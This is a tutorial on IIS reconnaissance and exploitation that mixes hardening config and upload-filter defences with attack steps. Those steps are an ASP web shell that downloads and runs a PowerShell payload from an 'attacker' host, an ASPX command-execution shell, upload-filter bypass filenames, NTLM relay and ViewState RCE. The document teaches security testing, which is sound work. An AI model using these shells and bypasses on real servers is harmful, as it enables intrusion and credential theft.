
01. HTTP IIS

What is HTTP IIS?

IIS (Internet Information Services) is a web server developed by Microsoft that runs on Windows operating systems. It uses the HTTP protocol (and optionally HTTPS) to serve web pages, host applications, and manage content over the internet or intranet.


Components of HTTP IIS

  1. HTTP Listener (HTTP.sys):

    • Kernel-mode driver that listens on port 80 (or 443 for HTTPS) and accepts requests before any application code runs.

    • Matches each request to a site by IP address, port and Host header, then queues it for that site's worker process.

  2. Worker Process (w3wp.exe):

    • Executes the web application (e.g., ASP.NET).

    • Processes requests and sends responses back to clients.

  3. Application Pool:

    • Isolates applications to improve stability and security.

    • Each app pool runs in its own worker process under its own identity (ApplicationPoolIdentity by default), so a compromised or crashed application cannot reach another pool's memory or files unless the identities share permissions.

  4. Static and Dynamic Content:

    • Serves static files: .html, .css, .js, images, etc.

    • Handles dynamic content (.asp, .aspx, .php, etc.) through the handler mapped to each extension: Classic ASP, ASP.NET, or PHP via FastCGI.


How HTTP Works in IIS

  1. Client sends a request:

    GET /index.html HTTP/1.1
    Host: example.com
    
  2. IIS receives the request via its HTTP listener.

  3. Routing to Application Pool:

    • IIS routes the request to the correct site and application pool.
  4. Execution:

    • For static content: Directly served.

    • For dynamic content: Passed to appropriate handlers like ASP.NET or PHP.

  5. Response:

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/10.0
    Content-Type: text/html
    
  6. Client receives the rendered page.


IIS Server Signature in Headers

You can identify IIS with HTTPie (http), curl -I, or the browser's Developer Tools (Network tab). Look at the response headers:

HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

This shows:

  • The web server is IIS 10.0 (shipped with Windows Server 2016 and later).

  • The backend is ASP.NET.

Both headers can be suppressed or rewritten by the administrator, so their absence does not rule IIS out; their presence is a strong hint, not proof.


Common File Types Served by IIS

File Type      Purpose                  Handled By
.html / .htm   Static pages             IIS Static Content module
.asp           Classic ASP scripts      Classic ASP engine (asp.dll)
.aspx          ASP.NET Web Forms        .NET Framework (ASP.NET handler)
web.config     Site/app configuration   IIS + ASP.NET (read by the server, never served; request filtering answers 404 for it by default)
.php           PHP pages                PHP via FastCGI (only if the PHP handler is installed)

Security Notes for IIS HTTP

  • Disable directory browsing so a request for a folder without a default document does not list its files.

  • Restrict HTTP methods (e.g., block PUT, DELETE, TRACE and the WebDAV verbs unless the application needs them).

  • Use Windows Authentication (Kerberos/NTLM) where possible; allow Basic authentication only over TLS, since it sends credentials base64-encoded, not encrypted.

  • Enable HTTPS (TLS) to encrypt traffic and redirect plain HTTP to it.

  • Strip the Server, X-Powered-By and X-AspNet-Version headers and keep debug mode and detailed errors off, so error pages do not leak stack traces.
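The notes above map to a handful of web.config settings. The fragment below is an added example written for this page, not configuration taken from any real site: the error page path and the extra denied extensions (.bak, .old) are placeholders, and removeServerHeader is only honoured by IIS 10.0 version 1709 and later (Windows Server 2019, Windows 10 1709+). The weak value each setting replaces is noted in the comment beside it.

```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <!-- weak: <compilation debug="true" /> leaks stack traces with source line numbers -->
    <compilation debug="false" />
    <!-- weak: <customErrors mode="Off" /> shows the yellow ASP.NET error page to everyone -->
    <customErrors mode="RemoteOnly" defaultRedirect="~/error.html" />
    <!-- drops the X-AspNet-Version response header -->
    <httpRuntime enableVersionHeader="false" />
    <httpCookies httpOnlyCookies="true" requireSSL="true" />
  </system.web>
  <system.webServer>
    <!-- weak: <directoryBrowse enabled="true" /> lists files when no default document exists -->
    <directoryBrowse enabled="false" />
    <security>
      <!-- removeServerHeader: IIS 10.0 version 1709 or later; drops "Server: Microsoft-IIS/10.0" -->
      <requestFiltering removeServerHeader="true">
        <!-- allowUnlisted="false" blocks PUT, DELETE, TRACE, PROPFIND and everything else not listed -->
        <verbs allowUnlisted="false">
          <add verb="GET" allowed="true" />
          <add verb="HEAD" allowed="true" />
          <add verb="POST" allowed="true" />
        </verbs>
        <!-- web.config, bin/ and *.config are already denied by the defaults; backup copies are not -->
        <fileExtensions>
          <add fileExtension=".bak" allowed="false" />
          <add fileExtension=".old" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
    <httpProtocol>
      <customHeaders>
        <!-- weak: leaving X-Powered-By: ASP.NET in place -->
        <remove name="X-Powered-By" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
```

allowUnlisted="false" on the verbs list also rejects OPTIONS and DEBUG; add them back only if a client genuinely needs them. The HTTPS redirect itself is not shown because it needs the URL Rewrite module or a site binding change rather than a web.config setting alone.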


1. Initial Nmap Scan

Command:

nmap <IP Address>

Purpose:

  • Quickly check which ports are open.

  • Look for port 80 (HTTP) or 443 (HTTPS).

Example:

nmap 192.168.1.5

2. Detailed Nmap Service and OS Detection

Command:

nmap <IP Address> -sV -O

Purpose:

  • Detects service versions.

  • Identifies the operating system.

  • Helps confirm the use of Microsoft IIS.

Example Output:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
OS details: Microsoft Windows Server 2016

This confirms that the target is running IIS. The httpd version is read from the Server header, so it is only as reliable as that header; the OS match comes from TCP/IP fingerprinting and is independent of it.


3. Check the Web Server in Browser

Steps:

  • Open your browser.

  • Enter the IP address:

http://192.168.1.5

You might see:

  • Default IIS welcome page.

  • Custom application hosted via IIS.


4. Fingerprint Web Server with WhatWeb

Command:

whatweb <IP Address>

Purpose:

  • Detects web server software and technologies.

  • Identifies IIS and possible scripting languages (e.g., ASP.NET).

Example:

whatweb 192.168.1.5

Output:

Microsoft-IIS/10.0, ASP.NET, HTML5

This confirms IIS with ASP.NET backend.


5. Inspect Web Response with HTTPie

Command:

http <IP Address>

Purpose:

  • Sends a GET request and returns headers and body.

  • Can reveal redirections, headers, and cookies.

Example:

http 192.168.1.5

Sample Output:

HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

You now know:

  • IIS version.

  • ASP.NET is enabled.
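As an added example (my own code, not from the page), the script below turns those headers into a fingerprint: it maps the IIS version to the Windows releases that ship it, translates X-AspNet-Version (a CLR build number) into a framework generation, and records which of the usual headers are missing, since that normally means an administrator suppressed them. The sample headers are constructed; fetch_headers() is the only part that touches the network and is not needed for the offline run.

```python
"""Fingerprint IIS from HTTP response headers (added example, stdlib only)."""
import http.client
from urllib.parse import urlsplit

# IIS version -> Windows releases that ship it (the OS is not otherwise visible in the headers).
IIS_TO_WINDOWS = {
    "6.0": "Windows Server 2003",
    "7.0": "Windows Server 2008 / Vista",
    "7.5": "Windows Server 2008 R2 / Windows 7",
    "8.0": "Windows Server 2012 / Windows 8",
    "8.5": "Windows Server 2012 R2 / Windows 8.1",
    "10.0": "Windows Server 2016, 2019 or 2022 / Windows 10, 11",
}

# X-AspNet-Version reports the CLR build, not the framework version the application targets.
CLR_BUILDS = {"1.1.4322": ".NET 1.1", "2.0.50727": ".NET 2.0 / 3.0 / 3.5", "4.0.30319": ".NET 4.x"}


def fingerprint(headers):
    """Derive IIS / ASP.NET facts from an iterable of (name, value) header pairs."""
    h = {name.lower(): value for name, value in headers}
    result = {"iis_version": None, "windows": None, "aspnet": False,
              "clr": None, "mvc_version": None, "hidden_headers": []}
    server = h.get("server", "")
    if server.lower().startswith("microsoft-iis/"):
        result["iis_version"] = server.split("/", 1)[1].strip()
        result["windows"] = IIS_TO_WINDOWS.get(result["iis_version"], "unknown IIS build")
    if "asp.net" in h.get("x-powered-by", "").lower() or "x-aspnet-version" in h:
        result["aspnet"] = True
    if "x-aspnet-version" in h:
        result["clr"] = CLR_BUILDS.get(h["x-aspnet-version"], h["x-aspnet-version"])
    result["mvc_version"] = h.get("x-aspnetmvc-version")
    # A missing header usually means an admin stripped it, not that IIS is absent: record it rather than conclude.
    for name in ("server", "x-powered-by", "x-aspnet-version"):
        if name not in h:
            result["hidden_headers"].append(name)
    return result


def fetch_headers(url, timeout=5):
    """Live HEAD request returning the raw header pairs (network; not used by the offline sample)."""
    u = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    conn.request("HEAD", u.path or "/")
    return conn.getresponse().getheaders()


# Constructed sample headers, not captured from a real host.
SAMPLE_HEADERS = [
    ("Server", "Microsoft-IIS/10.0"),
    ("X-Powered-By", "ASP.NET"),
    ("X-AspNet-Version", "4.0.30319"),
    ("Content-Type", "text/html; charset=utf-8"),
]

if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_HEADERS).items():
        print(f"{key:15} {value}")
```

If HEAD is rejected (405), repeat with GET; some hardened sites only strip headers on one of the two.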


6. Directory Bruteforce with Dirb

Command:

dirb http://<IP Address>

Purpose:

  • Discover hidden directories like:

    • /admin/

    • /aspnet_client/

    • /web.config

Example:

dirb http://192.168.1.5

Useful for IIS:

  • May expose .asp/.aspx pages, backup copies (web.config.bak, .old, .zip), leftover directories (aspnet_client, uploads) and admin areas.

  • IIS matches paths case-insensitively, so a lowercase wordlist finds Admin/ as well as admin/.

  • A direct hit on /web.config normally returns 404 from request filtering; a 200 there means the defaults were changed.

7. Browse IIS Site in CLI using Browsh

Command:

browsh --startup-url http://<IP Address>

Purpose:

  • Browse IIS site in terminal.

  • Good for headless or SSH environments.

Example:

browsh --startup-url http://192.168.1.5

IIS Recon Workflow (Recap)

Step  Tool               Purpose
1     nmap -sV -O        Detect IIS server and OS
2     Browser or browsh  View site
3     whatweb            Detect technologies
4     http               View headers (IIS version, ASP.NET)
5     dirb               Find hidden directories/files

IIS-Specific Attack Vectors & Exploitation Techniques


1. Hidden ASP/ASPX Pages Enumeration

Purpose:
IIS servers often host .asp or .aspx pages that may not be linked publicly but are sensitive (e.g., admin panels, login portals).

Tool:

dirb http://<IP> /usr/share/wordlists/dirb/common.txt -X .asp,.aspx

Tip: gobuster (gobuster dir -u http://<IP> -w <wordlist> -x asp,aspx,ashx,asmx) and ffuf work too; include the other ASP.NET handler extensions (.ashx, .asmx) rather than only .asp/.aspx.


2. web.config File Disclosure

Vulnerability:
web.config holds connection strings (often with database credentials), the machineKey that signs and encrypts ViewState, debug and custom-error settings, and sometimes API keys. IIS refuses direct requests for it by default (web.config is a hidden segment and .config a denied extension in request filtering, both answered with 404), so in practice the file leaks through backup copies (web.config.bak, web.config.old, web.config~), path traversal, or source-disclosure bugs in handlers rather than a plain GET.

Test:

http://<IP>/web.config

Payload Example in HTTPie:

http http://192.168.1.5/web.config
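Once a copy is in hand, the question is what to read first. The script below is an added example (not from the page) that triages a web.config: connection strings and the passwords inside them, appSettings keys that look like secrets, debug and custom-error state, the authentication mode, and the machineKey, which is what turns section 10 (ViewState) into code execution. The embedded web.config is constructed and every value in it is a placeholder.

```python
"""Triage a disclosed web.config: pull out what an attacker reads first (added example, stdlib only)."""
import re
import xml.etree.ElementTree as ET

SECRET_HINTS = ("key", "secret", "password", "pwd", "token", "connection")
PASSWORD_RE = re.compile(r"(?:password|pwd)\s*=\s*([^;]+)", re.IGNORECASE)


def triage_web_config(xml_text):
    """Return the settings that matter for the attacks on this page, keyed by what they enable."""
    root = ET.fromstring(xml_text)
    f = {"connection_strings": [], "db_passwords": [], "app_secrets": [],
         "debug": False, "custom_errors_off": False, "machine_key": None, "auth_mode": None}
    for add in root.iterfind("./connectionStrings/add"):
        cs = add.get("connectionString", "")
        f["connection_strings"].append((add.get("name"), cs))
        f["db_passwords"].extend(PASSWORD_RE.findall(cs))
    for add in root.iterfind("./appSettings/add"):
        key = add.get("key", "")
        if any(hint in key.lower() for hint in SECRET_HINTS):
            f["app_secrets"].append((key, add.get("value")))
    comp = root.find("./system.web/compilation")
    f["debug"] = comp is not None and comp.get("debug", "false").lower() == "true"
    ce = root.find("./system.web/customErrors")
    f["custom_errors_off"] = ce is not None and ce.get("mode", "").lower() == "off"
    auth = root.find("./system.web/authentication")
    f["auth_mode"] = auth.get("mode") if auth is not None else None
    mk = root.find("./system.web/machineKey")
    if mk is not None:  # static keys let an attacker sign or encrypt their own ViewState (section 10)
        f["machine_key"] = {k: mk.get(k) for k in ("validationKey", "decryptionKey", "validation", "decryption")}
    return f


# Constructed sample; every value is a placeholder, not a real credential or key.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=10.0.0.5;Database=app;User Id=appuser;Password=Placeholder1!" />
  </connectionStrings>
  <appSettings>
    <add key="PaymentApiKey" value="placeholder-api-key" />
    <add key="PageSize" value="25" />
  </appSettings>
  <system.web>
    <authentication mode="Forms" />
    <compilation debug="true" targetFramework="4.8" />
    <customErrors mode="Off" />
    <machineKey validationKey="00112233" decryptionKey="44556677" validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for key, value in triage_web_config(SAMPLE_WEB_CONFIG).items():
        print(f"{key:19} {value}")
```

A machineKey with SHA1 validation and a known validationKey is the direct input to the ViewState attack later on this page; debug="true" plus customErrors mode="Off" tells you the stack-trace checks in section 5 will pay off.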

3. NTLM Authentication (SMB/Web)

Vulnerability:
IIS sites using Windows Authentication challenge clients with NTLM (often behind a Negotiate header, which falls back to NTLM when Kerberos is unavailable). That:

  • Leaks the server's NetBIOS and DNS host name, domain and OS build in the NTLM challenge (Type 2 message) before any credential is sent.

  • Exposes Net-NTLMv2 challenge/response hashes of users who can be made to authenticate to an attacker host; Responder captures them for offline cracking and Impacket's ntlmrelayx relays them to services where signing is not enforced.

Check via headers:

http http://<IP>

Look for:

WWW-Authenticate: NTLM
WWW-Authenticate: Negotiate

Exploit:
Coerce a victim to authenticate to an attacker-controlled SMB/HTTP listener (Responder) to capture Net-NTLMv2 responses, or relay them (ntlmrelayx). These are challenge/response values, not NT hashes, so they can be cracked or relayed but not used for pass-the-hash. The challenge alone can be decoded with nmap --script http-ntlm-info to fingerprint the host without any credentials.
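The first bullet above needs no victim at all: send a Type 1 NEGOTIATE and the server answers with a Type 2 CHALLENGE whose AV_PAIRs carry its names and OS version. The script below is an added example (my own code, not from the page) that builds the Type 1, parses a Type 2, and, so it runs offline, constructs a sample Type 2 shaped like the one IIS returns; the host names, domain and build number in it are made up. probe() performs the live exchange and is not exercised by the offline run.

```python
"""NTLM over HTTP: send a Type 1 NEGOTIATE and decode the Type 2 CHALLENGE (added example, stdlib only)."""
import base64
import http.client
import struct

# NEGOTIATE flags: UNICODE | OEM | REQUEST_TARGET | NTLM | ALWAYS_SIGN | EXTENDED_SESSIONSECURITY | 128 | 56
NEG_FLAGS = 0xA0088207
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
AV_NAMES = {1: "netbios_host", 2: "netbios_domain", 3: "dns_host", 4: "dns_domain", 5: "dns_forest"}


def build_type1():
    """32-byte NEGOTIATE_MESSAGE with empty domain and workstation fields."""
    return (b"NTLMSSP\x00" + struct.pack("<II", 1, NEG_FLAGS)
            + struct.pack("<HHI", 0, 0, 32) + struct.pack("<HHI", 0, 0, 32))


def parse_type2(msg):
    """Pull target name, flags, server challenge, OS version and AV_PAIRs out of a CHALLENGE_MESSAGE."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)      # TargetNameFields
    flags = struct.unpack_from("<I", msg, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)      # TargetInfoFields
    info = {"flags": flags, "server_challenge": msg[24:32].hex(),
            "target_name": msg[tn_off:tn_off + tn_len].decode("utf-16-le")}
    if flags & NTLMSSP_NEGOTIATE_VERSION and min(tn_off, ti_off) >= 56:
        major, minor, build = struct.unpack_from("<BBH", msg, 48)  # Version field follows the 48-byte header
        info["os_version"] = f"{major}.{minor} build {build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                                        # AV_PAIR list: AvId, AvLen, Value
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        if av_id == 0:                                           # MsvAvEOL
            break
        value = msg[pos + 4:pos + 4 + av_len]
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == 7:                                         # MsvAvTimestamp (FILETIME)
            info["timestamp"] = struct.unpack("<Q", value)[0]
        pos += 4 + av_len
    return info


def utf16(s):
    return s.encode("utf-16-le")


def build_type2(netbios_host, netbios_domain, dns_host, dns_domain, os_ver=(10, 0, 17763)):
    """Constructed CHALLENGE_MESSAGE shaped like the one IIS returns (sample data, not a capture)."""
    target_name = utf16(netbios_domain)
    av_pairs = b"".join(struct.pack("<HH", av_id, len(v)) + v for av_id, v in
                        ((2, utf16(netbios_domain)), (1, utf16(netbios_host)),
                         (4, utf16(dns_domain)), (3, utf16(dns_host)))) + struct.pack("<HH", 0, 0)
    flags = 0xE28A8215                     # includes NEGOTIATE_VERSION and NEGOTIATE_TARGET_INFO
    version = struct.pack("<BBH", *os_ver) + b"\x00\x00\x00\x0f"
    tn_off = 56
    ti_off = tn_off + len(target_name)
    return (b"NTLMSSP\x00" + struct.pack("<I", 2)
            + struct.pack("<HHI", len(target_name), len(target_name), tn_off)
            + struct.pack("<I", flags) + bytes.fromhex("0123456789abcdef") + b"\x00" * 8
            + struct.pack("<HHI", len(av_pairs), len(av_pairs), ti_off)
            + version + target_name + av_pairs)


def probe(host, port=80, path="/", use_tls=False):
    """Live exchange (network; not exercised offline): offer a Type 1 and decode the Type 2 that comes back."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=5)
    token = base64.b64encode(build_type1()).decode()
    conn.request("GET", path, headers={"Authorization": "NTLM " + token})
    for name, value in conn.getresponse().getheaders():
        if name.lower() == "www-authenticate" and value.startswith("NTLM "):
            return parse_type2(base64.b64decode(value[5:]))
    return None


if __name__ == "__main__":
    print(parse_type2(build_type2("WEB01", "CORP", "web01.corp.local", "corp.local")))
```

The DNS domain name in the reply is the one to note: it is the AD domain the web server belongs to, which is what Responder and ntlmrelayx need to be pointed at later.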


4. IIS Short File Name Enumeration (8.3 Format)

Description:
IIS with 8.3 (DOS-style) short-name generation enabled leaks the short form of long file and directory names (admin~1.aspx, app_co~1) through wildcard requests such as /a*~1*/.aspx: the status code differs depending on whether anything matches. IIS 6 and 7.x are the classic targets, but any version is affected while 8.3 names exist on the volume and nothing filters the tilde.

Tool:
IIS Short Name Scanner (the original by Soroush Dalili is a Java jar; Python and Go ports such as shortscan exist). ffuf or Burp can replay the probes by hand.

Example:

python IISShortNameScanner.py -u http://192.168.1.5

Goal:
Reveal short names like admin~1.aspx, then guess the full name (admin_login.aspx, administration.aspx, ...) with a wordlist for targeted attacks. Only the first six characters of the name and a three-character extension are recovered.
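To show what the scanner actually does, here is the search it performs, as an added example written for this page rather than code from the scanner itself. It relies on the classic discriminator (404 when the wildcard pattern matches an existing short name, 400 when it does not) and recovers names character by character, then extensions. A constructed fake server stands in for a vulnerable IIS root so it runs offline; the real tool also varies the HTTP method (OPTIONS, DEBUG) and trailing path because the telling status codes differ between IIS versions.

```python
"""IIS 8.3 short-name enumeration: the wildcard-probe search behind IISShortNameScanner (added example)."""
import fnmatch

# Characters that can appear in the name/extension part of an 8.3 short name (simplified set).
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_-"
EXISTS, MISSING = 404, 400   # classic discriminator on vulnerable IIS: 404 = the wildcard matched something


def _extensions(probe, base, name):
    """Walk the up-to-3-character extension once the name part before ~1 is known."""
    exts = []
    if probe(f"{base}{name}~1/.aspx") == EXISTS:          # entry without an extension (usually a directory)
        exts.append("")
    stack = [""]
    while stack:
        prefix = stack.pop()
        for ch in CHARSET:
            ext = prefix + ch
            if probe(f"{base}{name}~1.{ext}*/.aspx") != EXISTS:
                continue
            if len(ext) == 3 or probe(f"{base}{name}~1.{ext}/.aspx") == EXISTS:
                exts.append("." + ext.upper())
            if len(ext) < 3:
                stack.append(ext)
    return exts


def enumerate_short_names(probe, base="/", limit=50):
    """Recover short names (e.g. ADMIN~1.ASP) using only 'matched / not matched' answers from probe()."""
    found = []
    stack = [""]
    while stack and len(found) < limit:
        prefix = stack.pop()
        for ch in CHARSET:
            name = prefix + ch
            if probe(f"{base}{name}*~1*/.aspx") != EXISTS:   # nothing starts with this prefix
                continue
            if len(name) == 6 or probe(f"{base}{name}~1*/.aspx") == EXISTS:
                found.extend(f"{name.upper()}~1{ext}" for ext in _extensions(probe, base, name))
            if len(name) < 6:
                stack.append(name)                           # longer names may share this prefix
    return found


def make_fake_server(short_names):
    """Constructed stand-in for a vulnerable IIS root holding the given 8.3 names (not a real host)."""
    names = [n.upper() for n in short_names]

    def probe(path):
        pattern = path[len("/"):-len("/.aspx")].upper()
        return EXISTS if any(fnmatch.fnmatchcase(n, pattern) for n in names) else MISSING
    return probe


if __name__ == "__main__":
    server = make_fake_server(["ADMIN~1.ASP", "WEB~1.CON", "APP_CO~1"])
    print(enumerate_short_names(server))
```

Against a live target, probe() would be a function that sends the request and returns the status code; with a 38-character set and one request per prefix, a typical root takes a few hundred requests, which is why the real scanner runs threads.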


5. Misconfigured .NET Debug/Stack Traces

Check:
Send malformed requests or non-existent routes:

http http://<IP>/nonexistent.aspx

Look for:

  • ASP.NET "yellow screen of death" error pages (customErrors mode="Off")

  • Stack traces with source line numbers (compilation debug="true")

  • Physical file paths (e.g. C:\inetpub\wwwroot\...)

  • Version info (the ASP.NET and .NET Framework versions printed in the error page footer)


6. Upload & Execute ASP Shells (If Upload is Enabled)

Payload File Example:
Create a reverse shell in shell.asp:

<%
 Set s=CreateObject("WScript.Shell")
 s.Run "powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')"
%>

Steps:

  1. Upload .asp shell (if vulnerable file upload).

  2. Access it via:

http://<IP>/uploads/shell.asp

7. Bypass Upload Filters (Double Extensions)

Techniques:

  • shell.asp;.jpg: IIS 6 stops parsing the file name at ';', so the request is handled as shell.asp while a naive extension check sees .jpg.

  • shell.asp%20 (or shell.asp.): NTFS silently drops trailing spaces and dots when the file is written, so a deny-list that sees "asp " or an empty extension ends up storing a plain shell.asp.

  • shell.asp::$DATA: the ::$DATA suffix names the default NTFS data stream, so writing it creates shell.asp itself while the check sees "$DATA".

Check whether IIS actually executes ASP code from the stored file by requesting it and looking for server-side output rather than the literal <% %> source. All three tricks target deny-list filters; an allow-list applied to the normalised final extension, plus a server-generated file name, defeats them.
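The defender's side of this, as an added example (my own code, not from the page): a deny-list check of the kind each trick above slips past, next to an allow-list that first refuses any name whose on-disk form could differ from the name being inspected. The test names are constructed from the list above; the extension sets are illustrative.

```python
"""Upload-name filters: the deny-list check the tricks above slip past, beside a hardened allow-list (added example)."""
import re
import uuid

ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}
EXEC_EXTS = {"asp", "aspx", "asa", "asax", "ashx", "asmx", "cer", "config", "php", "cshtml"}


def denylist_allows(filename):
    """Weak filter: rejects known executable extensions by looking at the text after the last dot."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in EXEC_EXTS


def hardened_allows(filename):
    """Refuse anything whose on-disk name could differ from the name being checked, then allow-list."""
    # Path separators, NTFS stream syntax (shell.asp::$DATA), the IIS 6 ';' truncation, percent-encoding and NULs.
    if re.search(r"[\\/:;%\x00]", filename):
        return False
    # NTFS drops trailing dots and spaces when it creates the file, so check the name it would actually use.
    name = filename.rstrip(". ")
    parts = name.lower().split(".")
    if len(parts) < 2 or not all(re.fullmatch(r"[a-z0-9_-]+", p) for p in parts):
        return False
    # Final extension must be allow-listed and no executable extension may hide earlier (shell.asp.jpg).
    return parts[-1] in ALLOWED_EXTS and not any(p in EXEC_EXTS for p in parts[:-1])


def stored_name(filename):
    """Never reuse the client's name on disk: random name, vetted extension only."""
    if not hardened_allows(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = filename.rstrip(". ").rsplit(".", 1)[-1].lower()
    return f"{uuid.uuid4().hex}.{ext}"


# Constructed names covering the bypasses listed above (shell.asp%20 as the client would send it, and decoded).
BYPASS_NAMES = ["shell.asp;.jpg", "shell.asp ", "shell.asp%20", "shell.asp.", "shell.asp::$DATA", "shell.asp.jpg"]

if __name__ == "__main__":
    for n in BYPASS_NAMES + ["photo.jpg"]:
        print(f"{n!r:22} denylist={denylist_allows(n)!s:5} hardened={hardened_allows(n)}")
```

Rejecting rather than normalising the stream and separator characters is deliberate: stripping them and then trusting the result reintroduces exactly the "what I checked is not what got written" gap the tricks exploit.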


8. Command Execution via .asp / .aspx RCE

If RCE is possible (e.g., via file upload or deserialization), chain with a reverse shell payload.

Example payload in .aspx (Process.Start alone runs the command but discards its output; redirect stdout and write it into the response so the result is readable):

<%@ Page Language="C#" %>
<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c whoami") { RedirectStandardOutput = true, UseShellExecute = false };
   Response.Write("<pre>" + Server.HtmlEncode(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd()) + "</pre>"); %>

9. IIS Internal IP Disclosure via Headers

Check for:

curl -I http://<IP>

Headers to Inspect:

  • Location / Content-Location: when IIS redirects (e.g. a folder requested without its trailing slash) and the request carried no usable Host header, older and misconfigured installs build the URL from the server's own interface address. Test with an HTTP/1.0 request that omits Host: curl --http1.0 -H "Host:" http://<IP>/images

  • Via, X-Forwarded-For, X-Client-IP: added by reverse proxies and load balancers in front of IIS; they expose the proxy chain rather than IIS itself.

These may reveal internal addressing (10.x, 172.16.x, 192.168.x) and the proxy chain, which helps with later pivoting and SSRF targeting.
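The Host-less request is the part curl makes awkward, so here it is by hand, as an added example (my own code, not from the page): a raw HTTP/1.0 request with no Host header, a small response parser, and a check that reports private or link-local IPv4 addresses in the headers listed above. The sample response is constructed to model the classic finding; raw_request() is the only network call and is not used by the offline run.

```python
"""IIS internal IP disclosure: a Host-less HTTP/1.0 request can make IIS build a redirect from its own address (added example)."""
import ipaddress
import re
import socket

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Location/Content-Location are where IIS itself leaks; the rest come from proxies in front of it.
SCAN_HEADERS = ("location", "content-location", "via", "x-forwarded-for", "x-client-ip", "set-cookie")


def raw_request(host, port=80, path="/images", host_header=None, timeout=5):
    """Hand-built request (network; not exercised offline) so the Host header can be left out entirely.

    http.client always adds Host; omitting it is the whole trick, hence the raw socket.
    Asking for a directory without its trailing slash provokes the 301 that carries Location.
    """
    req = f"GET {path} HTTP/1.0\r\n" + (f"Host: {host_header}\r\n" if host_header else "") + "\r\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_response(raw):
    """Split a raw HTTP response into (status line, {lower-case header name: [values]})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def leaked_internal_ips(raw):
    """Return (header, address) pairs for RFC 1918 / link-local IPv4 addresses found in the response headers."""
    _, headers = parse_response(raw)
    leaks = set()
    for name in SCAN_HEADERS:
        for value in headers.get(name, []):
            for candidate in IPV4.findall(value):
                try:
                    ip = ipaddress.IPv4Address(candidate)
                except ValueError:          # e.g. 999.1.1.1 matches the regex but is not an address
                    continue
                if ip.is_private or ip.is_link_local:
                    leaks.add((name, candidate))
    return sorted(leaks)


# Constructed response modelled on the classic finding; not captured from a real server.
SAMPLE_RESPONSE = ("HTTP/1.1 301 Moved Permanently\r\n"
                   "Server: Microsoft-IIS/10.0\r\n"
                   "Location: http://10.20.30.40/images/\r\n"
                   "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(leaked_internal_ips(SAMPLE_RESPONSE))
```

Run raw_request() twice, once with host_header set to the real name and once without, and diff the Location values: a server that only leaks on the Host-less request is the textbook case.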


10. Enumerate ASP.NET ViewState for Deserialization

If you find __VIEWSTATE values in forms, the page deserializes them on every POST. When the MAC is not verified (enableViewStateMac="false" on .NET Framework before 4.5, or AspNetEnforceViewStateMac switched off on later versions), or when the machineKey is known (for instance from a disclosed web.config), a crafted __VIEWSTATE reaches the .NET deserializer and gives RCE. .NET 4.5 and later verify the MAC regardless of enableViewStateMac, so on modern targets the practical route is a leaked or reused machineKey.

Tool:
ysoserial.net (ViewState plugin) builds the payload from the machineKey values plus the page's __VIEWSTATEGENERATOR or path; Burp Suite to tamper and resubmit.

Exploit Example:
Inject crafted payloads into __VIEWSTATE to trigger RCE.


Helpful Tools for IIS/ASP Testing

Tool                    Usage
nmap -sV -O             Detect IIS and services
whatweb                 Identify IIS version and ASP.NET
http / curl             Analyze headers and responses
dirb, gobuster, ffuf    Enumerate .asp, .aspx, web.config backups
ysoserial.net           ASP.NET ViewState deserialization payloads
IIS ShortName Scanner   Discover hidden files (8.3 short names)
Burp Suite              Web app testing and ViewState tampering
Responder / Impacket    NTLM hash capture (Responder) / relay (ntlmrelayx)